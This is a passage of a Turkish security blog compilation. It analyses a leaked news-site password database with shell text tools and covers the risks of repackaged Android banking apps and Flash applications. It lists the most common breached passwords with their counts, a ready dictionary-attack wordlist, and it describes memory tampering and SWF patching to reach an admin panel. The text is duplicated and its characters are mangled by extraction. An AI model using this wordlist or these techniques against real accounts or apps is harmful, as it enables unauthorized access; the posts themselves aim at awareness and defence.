Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 37: Hack 4 Career - 2011

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 38: Hack 4 Career - 2011

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

